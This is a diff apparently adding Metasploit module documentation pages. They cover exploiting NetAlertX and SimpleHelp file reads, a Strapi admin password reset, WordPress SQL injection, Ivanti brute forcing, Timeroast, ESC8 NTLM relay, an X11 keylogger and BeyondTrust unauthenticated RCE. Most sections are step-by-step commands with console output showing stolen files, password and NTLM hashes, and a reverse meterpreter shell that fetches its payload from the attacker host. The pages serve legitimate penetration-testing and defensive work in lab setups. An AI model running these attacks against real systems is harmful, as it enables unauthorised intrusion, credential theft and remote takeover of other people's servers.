+[*] 127.0.0.1:6000 - [7/9] Requesting XKEYBOARD map
+[*] 127.0.0.1:6000 - [8/9] Enabling notification on keyboard and map
+[*] 127.0.0.1:6000 - [9/9] Creating local keyboard map
+[+] 127.0.0.1:6000 - All setup, watching for keystrokes
+[+] 127.0.0.1:6000 - X11 Key presses observed: te[space]quuick[space]rown[space]foxmps[space]oveerr[space]the[space]lazy[space]do
+[-] 127.0.0.1:6000 - No key presses observed
+[-] 127.0.0.1:6000 - No key presses observed
+[-] 127.0.0.1:6000 - No key presses observed
+[-] 127.0.0.1:6000 - No key presses observed
+[-] 127.0.0.1:6000 - No key presses observed
+[-] 127.0.0.1:6000 - No key presses observed
+[-] 127.0.0.1:6000 - No key presses observed
+[-] 127.0.0.1:6000 - No key presses observed
+[*] 127.0.0.1:6000 - Closing X11 connection
+[+] 127.0.0.1:6000 - Logged keys stored to: /root/.msf4/loot/20240226150211_default_127.0.0.1_x11.keylogger_839830.txt
+[-] 127.0.0.1:6000 - Stopping running against current target...
+[*] 127.0.0.1:6000 - Control-C again to force quit all targets.
+[*] Auxiliary module execution completed
+```
+
+## Confirming
+
+To keylog the remote host, we use a tool called [xspy](http://tools.kali.org/sniffingspoofing/xspy)
+
+The output will be very similar to the metasploit module, but may differ. Compare the below two entries (spaces added to xspy for alignment):
+
+```
+xspy: the      quck         rown       foxumps      over         the       lazy      do
+msf:  te[space]quuick[space]rown[space]foxmps[space]oveerr[space]the[space]lazy[space]do
+```
@@ -0,0 +1,96 @@
+## Vulnerable Application
+
+
+An attacker can read any file through log functionality with no authentication.
+
+The vulnerability affects:
+
+    * v24.7.18 <= NetAlertX <= v24.9.12
+
+## Verification Steps
+
+### Installation
+
+1. `docker pull jokobsk/netalertx:24.9.12`
+
+2. docker run
+```bash
+docker run --rm --network=host \
+  -v /tmp/netalertx:/app/config \
+  -v /tmp/netalertx:/app/db \
+  -e TZ=Europe/Berlin \
+  -e PORT=20211 \
+  jokobsk/netalertx:24.9.12
+```
+
+### Verification
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use auxiliary/scanner/http/netalertx_file_read`
+4. Do: `run rhost=<rhost>`
+5. You should get the contents of the specified file.
+
+## Options
+
+- `RHOSTS`: target host
+- `RPORT`: target port, default 20211
+- `FILEPATH`: path to the required file
+- `DEPTH`: number of `../` to be prepended to `FILEPATH`
+
+## Scenarios
+
+```
+msf6 > use auxiliary/scanner/http/netalertx_file_read 
+msf6 auxiliary(scanner/http/netalertx_file_read) > show options
+
+Module options (auxiliary/scanner/http/netalertx_file_read):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   DEPTH     5                yes       Traversal Depth (to reach the root folder)
+   FILEPATH  /etc/passwd      yes       The path to the file to read
+   Proxies                    no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                     yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.h
+                                        tml
+   RPORT     20211            yes       The target port (TCP)
+   SSL       false            no        Negotiate SSL/TLS for outgoing connections
+   THREADS   1                yes       The number of concurrent threads (max one per host)
+   VHOST                      no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(scanner/http/netalertx_file_read) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 auxiliary(scanner/http/netalertx_file_read) > run
+[*] Received data:
+[*] root:x:0:0:root:/root:/bin/sh
+bin:x:1:1:bin:/bin:/sbin/nologin
+daemon:x:2:2:daemon:/sbin:/sbin/nologin
+lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
+sync:x:5:0:sync:/sbin:/bin/sync
+shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
+halt:x:7:0:halt:/sbin:/sbin/halt
+mail:x:8:12:mail:/var/mail:/sbin/nologin
+news:x:9:13:news:/usr/lib/news:/sbin/nologin
+uucp:x:10:14:uucp:/var/spool/uucppublic:/sbin/nologin
+cron:x:16:16:cron:/var/spool/cron:/sbin/nologin
+ftp:x:21:21::/var/lib/ftp:/sbin/nologin
+sshd:x:22:22:sshd:/dev/null:/sbin/nologin
+games:x:35:35:games:/usr/games:/sbin/nologin
+ntp:x:123:123:NTP:/var/empty:/sbin/nologin
+guest:x:405:100:guest:/dev/null:/sbin/nologin
+nobody:x:65534:65534:nobody:/:/sbin/nologin
+catchlog:x:100:101:catchlog:/:/sbin/nologin
+nginx:x:101:102:nginx:/var/lib/nginx:/sbin/nologin
+
+[*] Stored results in netalert_result.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/netalertx_file_read) > 
+
+
+```
+
+
@@ -0,0 +1,93 @@
+## Vulnerable Application
+There exists a path traversal vulnerability in the /toolbox-resource endpoint of SimpleHelp that enables unauthenticated
+remote attackers to download arbitrary files from the SimpleHelp server via crafted HTTP requests
+
+### Setup
+
+On Ubuntu 22.04 download a vulnerable version of SimpleHelp, for this demo we will use 5.5.7:
+`wget https://simple-help.com/releases/5.5.7/SimpleHelp-linux-amd64.tar.gz`
+
+Unzip the application:
+```
+cd /opt
+tar -xvf SimpleHelp-linux-amd64.tar.gz
+```
+
+Start the server:
+```
+cd SimpleHelp
+sudo sh serverstart.sh
+```
+
+Navigate to the Web App GUI at: `http://127.0.0.1` (by default the application should be listening on all interfaces).
+You should see "Welcome to your new SimpleHelp Server".
+Select "Start New Server". The application should now be vulnerable to the path traversal.
+
+## Verification Steps
+
+1. Start msfconsole
+1. Do: `use simplehelp_toolbox_path_traversal`
+1. Set the `RHOST`
+1. Run the module
+1. Receive the file `serverconfig.xml` from the SimpleHelp
+
+## Scenarios
+### SimpleHelp 5.5.7 running on Ubuntu 22.04
+```
+msf6 exploit(windows/local/cve_2024_35250_ks_driver) > use simplehelp_toolbox_path_traversal
+
+Matching Modules
+================
+
+   #  Name                                                      Disclosure Date  Rank    Check  Description
+   -  ----                                                      ---------------  ----    -----  -----------
+   0  auxiliary/scanner/http/simplehelp_toolbox_path_traversal  2025-01-12       normal  No     Simple Help Path Traversal Vulnerability
+
+
+Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/http/simplehelp_toolbox_path_traversal
+
+[*] Using auxiliary/scanner/http/simplehelp_toolbox_path_traversal
+msf6 auxiliary(scanner/http/simplehelp_toolbox_path_traversal) > set rhost 172.16.199.130
+rhost => 172.16.199.130
+msf6 auxiliary(scanner/http/simplehelp_toolbox_path_traversal) > run
+[*] Reloading module...
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version detected: 5.5.7
+[+] Downloaded 5233 bytes
+[+] File saved in: /Users/jheysel/.msf4/loot/20250220163655_default_172.16.199.130_simplehelp.trave_035651.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+### SimpleHelp 5.5.7 running on Windows 11
+```
+msf6 auxiliary(scanner/http/simplehelp_toolbox_path_traversal) > set rhosts 172.16.199.131
+rhosts => 172.16.199.131
+msf6 auxiliary(scanner/http/simplehelp_toolbox_path_traversal) > set filepath windows/system.ini
+filepath => windows/system.ini
+msf6 auxiliary(scanner/http/simplehelp_toolbox_path_traversal) > set depth 4
+depth => 4
+msf6 auxiliary(scanner/http/simplehelp_toolbox_path_traversal) > run
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Version detected: 5.5.7
+[+] Downloaded 219 bytes
+[+] File saved in: /Users/jheysel/.msf4/loot/20250221075039_default_172.16.199.131_simplehelp.trave_820456.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/http/simplehelp_toolbox_path_traversal) > cat /Users/jheysel/.msf4/loot/20250221075039_default_172.16.199.131_simplehelp.trave_820456.txt
+[*] exec: cat /Users/jheysel/.msf4/loot/20250221075039_default_172.16.199.131_simplehelp.trave_820456.txt
+
+; for 16-bit app support
+[386Enh]
+woafont=dosapp.fon
+EGA80WOA.FON=EGA80WOA.FON
+EGA40WOA.FON=EGA40WOA.FON
+CGA80WOA.FON=CGA80WOA.FON
+CGA40WOA.FON=CGA40WOA.FON
+
+[drivers]
+wave=mmdrv.dll
+timer=timer.drv
+
+[mci]
+```
@@ -0,0 +1,59 @@
+## Vulnerable Application
+
+This module abuses the mishandling of a password reset request for 
+Strapi CMS version 3.0.0-beta.17.4 to change the password of the admin user.
+
+Successfully tested against Strapi CMS version 3.0.0-beta.17.4.
+
+### Install
+
+
+```
+docker run -it -p 1337:1337 --rm node:16 /bin/bash
+export CXXFLAGS="-std=c++17"
+# Complete the quickstart
+npm install -g create-strapi-app@3.0.0-beta.17.4 && create-strapi-app yourProjectName
+```
+
+Navigate to http://localhost:1337/ to verify the application is running. Now create the first admin account at http://localhost:1337/admin
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use auxiliary/scanner/http/strapi_3_password_reset`
+1. Do: `set new_password testtesttest`
+1. Do: `set rport 1337`
+1. Do: `set rhosts 127.0.0.1`
+1. Do: `run`
+1. You should be able to reset the admin users password
+
+## Options
+
+### NEW_PASSWORD
+
+New Admin password. No default.
+
+## Scenarios
+
+### npx install of strapi 3.0.0-beta.17.4
+
+```
+msf6 > use auxiliary/scanner/http/strapi_3_password_reset
+msf6 auxiliary(scanner/http/strapi_3_password_reset) > set new_password testtesttest
+new_password => testtesttest
+msf6 auxiliary(scanner/http/strapi_3_password_reset) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 auxiliary(scanner/http/strapi_3_password_reset) > set rport 1337
+rport => 1337
+msf6 auxiliary(scanner/http/strapi_3_password_reset) > check
+[-] This module does not support check.
+msf6 auxiliary(scanner/http/strapi_3_password_reset) > run
+
+[*] Resetting admin password...
+[+] Password changed successfully!
+[+] User: superadminuser
+[+] Email: none@none.com
+[+] PASSWORD: testtesttest
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,54 @@
+## Vulnerable Application
+
+Perfect Survey, a WordPress plugin, version 1.5.1 is affected by an unauthenticated SQL injection vulnerability
+via the `question_id` parameter.
+
+An unauthenticated attacker can exploit this SQL injection vulnerability to retrieve sensitive information,
+such as usernames and password hashes, from the `wp_users` table.
+
+The vulnerable plugin can be downloaded from the [WordPress plugin repository](https://wordpress.org/plugins/).
+The specific vulnerable version can be found here: https://www.exploit-db.com/apps/51c80e6262c3a39fa852ebf96ff86b78-perfect-survey.1.5.1.zip
+
+## Verification Steps
+
+1. Install the WordPress application and the vulnerable version of the Perfect Survey plugin.
+2. Start `msfconsole`.
+3. Run: `use auxiliary/scanner/http/wp_perfect_survey_sqli`.
+4. Set the target host: `set RHOSTS [ip]`.
+5. Adjust other options as necessary, such as `TARGETURI` (default is `/`).
+6. Execute the module: `run`.
+7. The module should retrieve usernames and password hashes from the WordPress installation.
+
+## Options
+
+## Scenarios
+
+### WordPress with Perfect Survey Plugin 1.5.1 on Ubuntu 20.04
+
+#### Example
+
+```sh
+msf6 > use auxiliary/scanner/http/wp_perfect_survey_sqli
+[*] Using auxiliary/scanner/http/wp_perfect_survey_sqli
+msf6 auxiliary(scanner/http/wp_perfect_survey_sqli) > set RHOSTS 192.168.1.104
+RHOSTS => 192.168.1.104
+msf6 auxiliary(scanner/http/wp_perfect_survey_sqli) > set RPORT 8000
+RPORT => 8000
+msf6 auxiliary(scanner/http/wp_perfect_survey_sqli) > set TARGETURI /wordpress
+TARGETURI => /wordpress
+msf6 auxiliary(scanner/http/wp_perfect_survey_sqli) > exploit 
+[*] Running module against 192.168.1.104
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable.
+[*] Exploiting SQLi in Perfect Survey plugin...
+[*] Extracting credential information
+
+WordPress User Credentials
+==========================
+
+ Username  Email                Hash
+ --------  -----                ----
+ admin     admin@localhost.com  $P$BwkQxR6HIt64UjYRG4D5GRKYdk.qcR1
+msf6 auxiliary(scanner/http/wp_perfect_survey_sqli) >
+```
@@ -0,0 +1,148 @@
+## Vulnerable Application
+
+The vulnerability affects the **TI WooCommerce Wishlist** plugin for WordPress,
+versions **up to 2.8.2**, allowing **unauthenticated SQL injection** via specific parameters.
+The **WooCommerce** plugin is also required for the setup.
+
+### Pre-requisites:
+- **Docker** and **Docker Compose** installed.
+
+### Setup Instructions:
+
+1. **Download the Docker Compose file**:
+   Save the following content in a `docker-compose.yml` file:
+
+```yaml
+version: '3.1'
+
+services:
+  wordpress:
+    image: wordpress:latest
+    restart: always
+    ports:
+      - 5555:80
+    environment:
+      WORDPRESS_DB_HOST: db
+      WORDPRESS_DB_USER: chocapikk
+      WORDPRESS_DB_PASSWORD: dummy_password
+      WORDPRESS_DB_NAME: exploit_market
+    mem_limit: 512m
+    volumes:
+      - wordpress:/var/www/html
+
+  db:
+    image: mysql:5.7
+    restart: always
+    environment:
+      MYSQL_DATABASE: exploit_market
+      MYSQL_USER: chocapikk
+      MYSQL_PASSWORD: dummy_password
+      MYSQL_RANDOM_ROOT_PASSWORD: '1'
+    volumes:
+      - db:/var/lib/mysql
+
+volumes:
+  wordpress:
+  db:
+```
+
+2. **Start the Docker environment**:
+   Run the following command in the directory where you saved the `docker-compose.yml` file:
+
+```bash
+docker-compose up -d
+```
+
+3. **Install WooCommerce and TI WooCommerce Wishlist Plugins**:
+   - Download the WooCommerce and TI WooCommerce Wishlist plugins:
+
+```bash
+wget https://downloads.wordpress.org/plugin/woocommerce.9.3.3.zip
+wget https://downloads.wordpress.org/plugin/ti-woocommerce-wishlist.2.8.2.zip
+```
+
+   - Install the plugins by copying them into your WordPress container:
+
+```bash
+unzip woocommerce.9.3.3.zip
+docker cp woocommerce wordpress:/var/www/html/wp-content/plugins/
+
+unzip ti-woocommerce-wishlist.2.8.2.zip
+docker cp ti-woocommerce-wishlist wordpress:/var/www/html/wp-content/plugins/
+```
+
+4. **Activate WooCommerce and TI WooCommerce Wishlist Plugins**:
+   - Navigate to `http://localhost:5555/wp-admin` in your browser, and activate both
+   **WooCommerce** and **TI WooCommerce Wishlist** plugins.
+   - Complete the WooCommerce setup wizard to ensure the plugin is properly
+   initialized, including configuring the site through the "Customize Site" option.
+
+## Verification Steps
+
+1. **Set up WordPress** with the vulnerable **TI WooCommerce Wishlist 2.8.2** and **WooCommerce** plugins.
+2. **Start Metasploit** using `msfconsole`.
+3. Use the appropriate module for the vulnerability:
+
+```bash
+   use auxiliary/scanner/http/wp_ti_woocommerce_wishlist_sqli
+```
+
+4. Set the target's IP and URI:
+
+```bash
+   set RHOST <target_ip>
+   set TARGETURI /
+```
+
+5. **Run the module**:
+
+```bash
+   run
+```
+
+6. **Verify the SQL Injection**:
+   The SQL injection will attempt to retrieve or manipulate data from the WordPress database through the `order` parameter.
+
+## Options
+
+### PRODUCT_ID_MIN and PRODUCT_ID_MAX
+These options specify the range of `product_id` values used to bruteforce the product
+during the SQL injection attack.
+The default range is from 1 to 100, but this can be adjusted based on your target.
+
+### COUNT
+This option specifies the number of rows to retrieve from the database during the SQL injection attack.
+
+## Scenarios
+
+The following scenario demonstrates an SQL injection attack against a WordPress
+installation running **TI WooCommerce Wishlist 2.8.2** with **WooCommerce** in a Docker environment.
+
+### Step-by-step Scenario
+
+```bash
+msf6 auxiliary(scanner/http/wp_ti_woocommerce_wishlist_sqli) > run http://127.0.0.1:5555
+
+[*] Testing Product IDs from 0 to 100, please wait...
+[+] Share key found: e93cca
+[*] Performing SQL Injection using share key: e93cca
+[*] SQL Injection successful, retrieving user credentials...
+[*] {SQLi} Executing (SELECT 4 FROM information_schema.tables WHERE table_name = 'wp_users')
+[*] {SQLi} Encoded to (SELECT 4 FROM information_schema.tables WHERE table_name = 0x77705f7573657273)
+[*] {SQLi} Time-based injection: expecting output of length 1
+[*] {WPSQLi} Retrieved default table prefix: 'wp_'
+[*] {SQLi} Executing (select group_concat(CvjX) from (select cast(concat_ws(';',ifnull(user_login,''),ifnull(user_pass,'')) as binary) CvjX from wp_users limit 1) cUla)
+[*] {SQLi} Encoded to (select group_concat(CvjX) from (select cast(concat_ws(0x3b,ifnull(user_login,repeat(0x2f,0)),ifnull(user_pass,repeat(0x8c,0))) as binary) CvjX from wp_users limit 1) cUla)
+[*] {SQLi} Time-based injection: expecting output of length 44
+[*] {WPSQLi} Dumped user data:
+wp_users
+========
+
+    user_login  user_pass
+    ----------  ---------
+    chocapikk   $P$BPdY0XccQT2nvSXE8bjsn1CERoF7eJ.
+
+[+] Loot saved to: /home/chocapikk/.msf4/loot/20240930123016_default_127.0.0.1_wordpress.users_970346.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
@@ -0,0 +1,19 @@
+## Description
+
+The module performs bruteforce attack against Ivanti Connect Secure.
+It allows to attack both regular user and admin as well - you can select which type of account to attack with `ADMIN` parameter. 
+
+## Vulnerable Application
+
+- [Ivanti](https://www.ivanti.com/products/connect-secure-vpn)
+
+## Verification Steps
+
+1. `use auxiliary/scanner/ivanti/login_scanner`
+2. `set RHOSTS [IP]`
+3. either `set USERNAME [username]` or `set USERPASS_FILE [usernames file]`
+4. either `set PASSWORD [password]` or `set PASS_FILE [passwords file]`
+5. `set ADMIN [attack admin?]`
+6. `run`
+
+
@@ -0,0 +1,96 @@
+## Vulnerable Application
+
+## Verification Steps
+
+1. Use the supplied Dockerfile to start a vulnerable instance of the application
+   1. Build it with: `docker build -t ntpd:4.2.8p3 .`
+   1. Run it with: `docker run --rm -it --name ntp-server -p 123:123/udp ntpd:4.2.8p3`
+1. Start `msfconsole` and use the module
+1. Set the `RHOSTS` value as necessary
+1. Run the module and see that the target is vulnerable
+
+### Dockerfile
+Use this as `ntp.conf`:
+
+```
+# Basic NTP configuration
+server 0.pool.ntp.org iburst
+server 1.pool.ntp.org iburst
+server 2.pool.ntp.org iburst
+server 3.pool.ntp.org iburst
+
+driftfile /var/lib/ntp/ntp.drift
+
+# Enable authentication for secure associations
+enable auth
+
+# Define trusted keys
+trustedkey 1
+
+# Open restrictions for all clients on the local network (example: 192.168.0.0/16)
+restrict default kod nomodify notrap
+restrict 127.0.0.1
+restrict ::1
+restrict 192.168.0.0 mask 255.255.0.0 autokey
+
+# Uncomment to allow all clients (use cautiously)
+# restrict default kod nomodify notrap
+```
+
+Use this as `Dockerfile`:
+
+```
+ARG version=4.2.8p3
+FROM ubuntu:16.04
+ARG version
+
+# Install dependencies
+RUN apt-get update && apt-get install -y \
+    wget \
+    build-essential \
+    libcap-dev \
+    libssl-dev && \
+    apt-get clean
+
+# Download and build NTPD
+WORKDIR /tmp
+RUN wget https://web.archive.org/web/20240608062853/https://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-$version.tar.gz && \
+    tar -xzf ntp-$version.tar.gz && \
+    cd ntp-$version && \
+    ./configure --prefix=/usr/local --enable-linuxcaps && \
+    make && \
+    make install && \
+    cd .. && \
+    rm -rf ntp-$version*
+
+# Add configuration file
+COPY ntp.conf /etc/ntp.conf
+
+# Expose NTP port (123)
+EXPOSE 123/udp
+
+# Run ntpd
+ENTRYPOINT ["/usr/local/bin/ntpd"]
+CMD ["-g", "-d", "-d"]
+```
+
+## Options
+
+## Scenarios
+
+### Ubuntu 16.04 NTPd 4.2.8p3
+
+```
+metasploit-framework (S:0 J:0) auxiliary(scanner/ntp/ntp_nak_to_the_future) > set RHOSTS 192.168.159.128, 192.168.159.10
+RHOSTS => 192.168.159.128, 192.168.159.10
+metasploit-framework (S:0 J:0) auxiliary(scanner/ntp/ntp_nak_to_the_future) > run
+[+] 192.168.159.128:123 - NTP - VULNERABLE: Accepted a NTP symmetric active association
+[*] Scanned 1 of 2 hosts (50% complete)
+[*] Scanned 1 of 2 hosts (50% complete)
+[*] Scanned 1 of 2 hosts (50% complete)
+[*] Scanned 1 of 2 hosts (50% complete)
+[*] Scanned 1 of 2 hosts (50% complete)
+[*] Scanned 2 of 2 hosts (100% complete)
+[*] Auxiliary module execution completed
+metasploit-framework (S:0 J:0) auxiliary(scanner/ntp/ntp_nak_to_the_future) >
+```
@@ -0,0 +1,47 @@
+## Vulnerable Application
+Windows authenticates NTP requests by calculating the message digest using the NT hash followed by the first
+48 bytes of the NTP message (all fields preceding the key ID). An attacker can abuse this to recover hashes
+that can be cracked offline for machine and trust accounts. The attacker must know the accounts RID, but
+because RIDs are sequential, they can easily be enumerated.
+
+## Verification Steps
+
+1. Setup a Windows domain controller target
+1. Start msfconsole
+1. Use the `auxiliary/admin/dcerpc/samr_account` module to create a new computer account with the `ADD_COMPUTER` action
+   1. Note the RID (the last part of the SID) and password of the new account
+1. Use the `auxiliary/scanner/ntp/timeroast` module
+1. Set the `RHOSTS` option to the target domain controller
+1. Set the `RIDS` option to the RID of the new account
+1. Run the module and see that a hash is collected, this has will show up in the output of the `creds` command if a
+  database is connected
+
+## Options
+
+### RIDS
+The RIDs to enumerate (e.g. 1000-2000). Multiple values and ranges can be specified using a comma as a separator.
+
+## Scenarios
+
+### Windows 2019 x64 Domain Controller
+
+```
+msf6 auxiliary(scanner/ntp/timeroast) > set RIDS 4200-4205
+RIDS => 4200-4205
+msf6 auxiliary(scanner/ntp/timeroast) > set RHOSTS 192.168.159.10
+RHOSTS => 192.168.159.10
+msf6 auxiliary(scanner/ntp/timeroast) > run
+[*] Checking RID: 4200
+[*] Checking RID: 4201
+[+] Hash for RID: 4201 - 4201:$sntp-ms$74e3c4ac73afe868119ff98613888d48$1c0100e900000000000a2c704c4f434ceb0aaf8ac9813bd40000000000000000eb0aea216d99a558eb0aea216d99e010
+[*] Checking RID: 4202
+[+] Hash for RID: 4202 - 4202:$sntp-ms$e106388a43f6bbd5365e3a6f2dee741d$1c0100e900000000000a2c704c4f434ceb0aaf8ac78c5c9a0000000000000000eb0aea21bb83de46eb0aea21bb8442f0
+[*] Checking RID: 4203
+[*] Checking RID: 4204
+[+] Hash for RID: 4204 - 4204:$sntp-ms$d0b1961cc3d57a1eaa40bfeeb9f30eb9$1c0100e900000000000a2c704c4f434ceb0aaf8ac653c2f50000000000000000eb0aea222a6c25c3eb0aea222a6c6a8c
+[*] Checking RID: 4205
+[*] Waiting on 3 pending responses...
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/ntp/timeroast) >
+```
@@ -138,7 +138,7 @@ Local File System Commands
 This session also works with the following modules:

  auxiliary/admin/dcerpc/icpr_cert
-  auxiliary/admin/dcerpc/samr_computer
+  auxiliary/admin/dcerpc/samr_account
  auxiliary/admin/smb/delete_file
  auxiliary/admin/smb/download_file
  auxiliary/admin/smb/psexec_ntdsgrab
@@ -0,0 +1,65 @@
+## Vulnerable Application
+This module creates an SMB server and then relays the credentials passed to it
+to an HTTP server to gain an authenticated connection.  Once that connection is
+established, the module makes an authenticated request for a certificate based
+on a given template.
+
+## Verification Steps
+
+1. Install and configure the application
+    * See https://docs.metasploit.com/docs/pentesting/active-directory/ad-certificates/overview.html#setting-up-a-esc8-vulnerable-host
+2. Start `msfconsole`
+2. Do: `use auxiliary/server/relay/esc8`
+3. Set the `RELAY_TARGETS` option to the AD CS Web Enrollment server
+4. Run the module and wait for a request to be relayed
+
+## Options
+
+### MODE
+The issue mode. This controls what the module will do once an authenticated session is established to the Web Enrollment
+server. Must be one of the following options:
+
+* ALL: Enumerate all available certificate templates and then issue each of them
+* AUTO: Automatically select either the `User` or `DomainController` and `Machine` (`Computer`) templates to issue
+  based on if the authenticated user is a user or machine account. The determination is based on checking for a `$` 
+  at the end of the name, which means that it is a machine account.
+* QUERY_ONLY: Enumerate all available certificate templates but do not issue any.  Not all certificate templates
+  available for use will be displayed; templates with the flag CT_FLAG_MACHINE_TYPE set will not show available and 
+  include `Machine` (AKA `Computer`) and `DomainController`  
+* SPECIFIC_TEMPLATE: Issue the certificate template specified in the `CERT_TEMPLATE` option
+
+### CERT_TEMPLATE
+The template to issue if MODE is SPECIFIC_TEMPLATE.
+
+## Scenarios
+
+### Version and OS
+
+```
+msf6 auxiliary(server/relay/esc8) > run
+[*] Auxiliary module running as background job 1.
+msf6 auxiliary(server/relay/esc8) > 
+[*] SMB Server is running. Listening on 0.0.0.0:445
+[*] Server started.
+[*] New request from 192.168.159.129
+[*] Received request for MSFLAB\smcintyre
+[*] Relaying to next target http://192.168.159.10:80/certsrv/
+[+] Identity: MSFLAB\smcintyre - Successfully authenticated against relay target http://192.168.159.10:80/certsrv/
+[SMB] NTLMv2-SSP Client     : 192.168.159.10
+[SMB] NTLMv2-SSP Username   : MSFLAB\smcintyre
+[SMB] NTLMv2-SSP Hash       : smcintyre::MSFLAB:821ad4c6b40475f4:07a6e0fd89d9af86a5b0e12d24915b4d:010100000000000071fe99aa0a27db01eabcbc6e8fcb6ed20000000002000c004d00530046004c00410042000100040044004300040018006d00730066006c00610062002e006c006f00630061006c0003001e00440043002e006d00730066006c00610062002e006c006f00630061006c00050018006d00730066006c00610062002e006c006f00630061006c000700080071fe99aa0a27db01060004000200000008003000300000000000000001000000002000004206ecc9e398d7766166f0f45d8bdcf7708c8f278f2cff1cc58017f9acf0f5400a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003100350039002e003100320038000000000000000000
+
+[*] Creating certificate request for MSFLAB\smcintyre using the User template
+[*] Generating CSR...
+[*] CSR Generated
+[*] Requesting relay target generate certificate...
+[+] Certificate generated using template User and MSFLAB\smcintyre
+[*] Attempting to download the certificate from /certsrv/certnew.cer?ReqID=184&
+[+] Certificate for MSFLAB\smcintyre using template User saved to /home/smcintyre/.msf4/loot/20241025142116_default_192.168.159.10_windows.ad.cs_995918.pfx
+[*] Relay tasks complete; waiting for next login attempt.
+[*] Received request for MSFLAB\smcintyre
+[*] Identity: MSFLAB\smcintyre - All targets relayed to
+[*] New request from 192.168.159.129
+[*] Received request for MSFLAB\smcintyre
+[*] Identity: MSFLAB\smcintyre - All targets relayed to
+```
@@ -0,0 +1,101 @@
+## Vulnerable Application
+This exploit achieves unauthenticated remote code execution against BeyondTrust Privileged Remote
+Access (PRA) and Remote Support (RS), with the privileges of the site user of the targeted BeyondTrust
+product site. This exploit targets PRA and RS versions `24.3.1` and below.
+
+## Testing
+This exploit was tested against a vulnerable BeyondTrust Remote Support target running version `24.1.2`. To install
+a virtual appliance, follow [this documentation](https://docs.beyondtrust.com/rs/docs/va-install). You will first need
+to acquire the relevant software packages.
+
+## Verification Steps
+
+1. Start msfconsole
+2. `use exploit/linux/http/beyondtrust_pra_rs_unauth_rce`
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set PAYLOAD cmd/linux/http/x64/meterpreter_reverse_tcp`
+5. `set LHOST eth0`
+6. `set LPORT 4444`
+7. `check`
+8. `exploit`
+
+## Options
+
+### TargetCompanyName
+If set, use this name value to identify the company name of the deployed site (e.g. `mytestcompany`).
+By default, this is auto discovered.
+
+### TargetServerFQDN
+If set, use this FQDN value to identify the FQDN of the deployed site (e.g. `support.mytestcompany.com`).
+By default, this is auto discovered.
+
+### LeverageCVE_2024_12356
+By default, this exploit does not leverage the argument injection vulnerability CVE-2024-12356, and instead exploits the
+SQLi vulnerability CVE-2025-1094 directly. Enabling this option will cause this exploit to leverage CVE-2024-12356 during
+the exploitation of the SQLi vulnerability CVE-2025-1094. In either case the SQLi vulnerability CVE-2025-1094 is leveraged
+to achieve RCE.
+
+## Scenarios
+
+### Default
+
+```
+msf6 exploit(linux/http/beyondtrust_pra_rs_unauth_rce) > show options 
+
+Module options (exploit/linux/http/beyondtrust_pra_rs_unauth_rce):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS   192.168.86.105   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.
+                                       html
+   RPORT    443              yes       The target port (TCP)
+   SSL      true             no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
+
+   Name                Current Setting  Required  Description
+   ----                ---------------  --------  -----------
+   FETCH_COMMAND       CURL             yes       Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET)
+   FETCH_DELETE        true             yes       Attempt to delete the binary after execution
+   FETCH_FILENAME      usKuEPuSzgnx     no        Name to use on remote system when storing payload; cannot contain spaces or slashes
+   FETCH_SRVHOST                        no        Local IP to use for serving payload
+   FETCH_SRVPORT       8080             yes       Local port to use for serving payload
+   FETCH_URIPATH                        no        Local URI to use for serving payload
+   FETCH_WRITABLE_DIR  /var/tmp         yes       Remote writable dir to store payload; cannot contain spaces
+   LHOST               eth0             yes       The listen address (an interface may be specified)
+   LPORT               4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Default
+
+
+
+View the full module info with the info, or info -d command.
+
+msf6 exploit(linux/http/beyondtrust_pra_rs_unauth_rce) > check
+[*] 192.168.86.105:443 - The target appears to be vulnerable. Detected version 24.1.2
+msf6 exploit(linux/http/beyondtrust_pra_rs_unauth_rce) > exploit
+[*] Started reverse TCP handler on 192.168.86.122:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable. Detected version 24.1.2
+[*] Using company name: mytestcompany
+[*] Sending stage (3045380 bytes) to 192.168.86.105
+[*] Meterpreter session 1 opened (192.168.86.122:4444 -> 192.168.86.105:10104) at 2025-01-31 10:51:38 +0000
+
+meterpreter > getuid
+Server username: mytestcompany
+meterpreter > sysinfo
+Computer     : 192.168.86.105
+OS           : Gentoo 2.14 (Linux 6.1.76-bt)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
